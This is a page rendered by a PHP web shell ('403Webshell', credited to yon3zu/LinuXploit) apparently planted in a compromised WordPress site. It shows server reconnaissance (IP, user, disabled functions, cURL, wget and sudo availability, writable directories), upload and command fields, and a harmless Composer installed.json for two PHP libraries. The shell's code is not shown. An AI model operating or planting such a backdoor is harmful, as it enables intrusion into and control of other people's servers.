403Webshell
Server IP : 81.2.241.106  /  Your IP : 216.73.216.165
Web Server : Apache/2.4.67 (Debian)
System : Linux tranq-f.bakta.org 5.10.0-45-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64
User : lisky ( 1002)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/lisky/wp-content/plugins/events-manager/includes/php/composer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/lisky/wp-content/plugins/events-manager/includes/php/composer/installed.json
{
    "packages": [
        {
            "name": "giggsey/libphonenumber-for-php-lite",
            "version": "8.13.32",
            "version_normalized": "8.13.32.0",
            "source": {
                "type": "git",
                "url": "https://github.com/giggsey/libphonenumber-for-php-lite.git",
                "reference": "74d0f7acc1ab7a517e0e7299a4c3ff2ed73c5072"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/giggsey/libphonenumber-for-php-lite/zipball/74d0f7acc1ab7a517e0e7299a4c3ff2ed73c5072",
                "reference": "74d0f7acc1ab7a517e0e7299a4c3ff2ed73c5072",
                "shasum": ""
            },
            "require": {
                "php": "^8.0",
                "symfony/polyfill-mbstring": "^1.17"
            },
            "conflict": {
                "giggsey/libphonenumber-for-php": "*"
            },
            "require-dev": {
                "ext-dom": "*",
                "friendsofphp/php-cs-fixer": "^3.12",
                "infection/infection": "^0.26.16",
                "pear/pear-core-minimal": "^1.10.11",
                "pear/pear_exception": "^1.0.2",
                "pear/versioncontrol_git": "^0.5",
                "phing/phing": "^2.17.4",
                "phpstan/extension-installer": "^1.2",
                "phpstan/phpstan": "^1.8",
                "phpstan/phpstan-phpunit": "^1.2",
                "phpunit/phpunit": "^9.5.26",
                "symfony/console": "^6.0"
            },
            "suggest": {
                "giggsey/libphonenumber-for-php": "Use libphonenumber-for-php for geocoding, carriers, timezones and matching"
            },
            "time": "2024-03-12T08:07:45+00:00",
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "8.x-dev"
                }
            },
            "installation-source": "dist",
            "autoload": {
                "psr-4": {
                    "libphonenumber\\": "src/"
                },
                "exclude-from-classmap": [
                    "/src/data/",
                    "/src/carrier/data/",
                    "/src/geocoding/data/",
                    "/src/timezone/data/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "Apache-2.0"
            ],
            "authors": [
                {
                    "name": "Joshua Gigg",
                    "email": "giggsey@gmail.com",
                    "homepage": "https://giggsey.com/"
                }
            ],
            "description": "A lite version of giggsey/libphonenumber-for-php, which is a PHP Port of Google's libphonenumber",
            "homepage": "https://github.com/giggsey/libphonenumber-for-php-lite",
            "keywords": [
                "geocoding",
                "geolocation",
                "libphonenumber",
                "mobile",
                "phonenumber",
                "validation"
            ],
            "support": {
                "issues": "https://github.com/giggsey/libphonenumber-for-php-lite/issues",
                "source": "https://github.com/giggsey/libphonenumber-for-php-lite"
            },
            "install-path": "../giggsey/libphonenumber-for-php-lite"
        },
        {
            "name": "symfony/polyfill-mbstring",
            "version": "v1.29.0",
            "version_normalized": "1.29.0.0",
            "source": {
                "type": "git",
                "url": "https://github.com/symfony/polyfill-mbstring.git",
                "reference": "9773676c8a1bb1f8d4340a62efe641cf76eda7ec"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/9773676c8a1bb1f8d4340a62efe641cf76eda7ec",
                "reference": "9773676c8a1bb1f8d4340a62efe641cf76eda7ec",
                "shasum": ""
            },
            "require": {
                "php": ">=7.1"
            },
            "provide": {
                "ext-mbstring": "*"
            },
            "suggest": {
                "ext-mbstring": "For best performance"
            },
            "time": "2024-01-29T20:11:03+00:00",
            "type": "library",
            "extra": {
                "thanks": {
                    "name": "symfony/polyfill",
                    "url": "https://github.com/symfony/polyfill"
                }
            },
            "installation-source": "dist",
            "autoload": {
                "files": [
                    "bootstrap.php"
                ],
                "psr-4": {
                    "Symfony\\Polyfill\\Mbstring\\": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Nicolas Grekas",
                    "email": "p@tchwork.com"
                },
                {
                    "name": "Symfony Community",
                    "homepage": "https://symfony.com/contributors"
                }
            ],
            "description": "Symfony polyfill for the Mbstring extension",
            "homepage": "https://symfony.com",
            "keywords": [
                "compatibility",
                "mbstring",
                "polyfill",
                "portable",
                "shim"
            ],
            "support": {
                "source": "https://github.com/symfony/polyfill-mbstring/tree/v1.29.0"
            },
            "funding": [
                {
                    "url": "https://symfony.com/sponsor",
                    "type": "custom"
                },
                {
                    "url": "https://github.com/fabpot",
                    "type": "github"
                },
                {
                    "url": "https://tidelift.com/funding/github/packagist/symfony/symfony",
                    "type": "tidelift"
                }
            ],
            "install-path": "../symfony/polyfill-mbstring"
        }
    ],
    "dev": true,
    "dev-package-names": []
}

Youez - 2016 - github.com/yon3zu
LinuXploit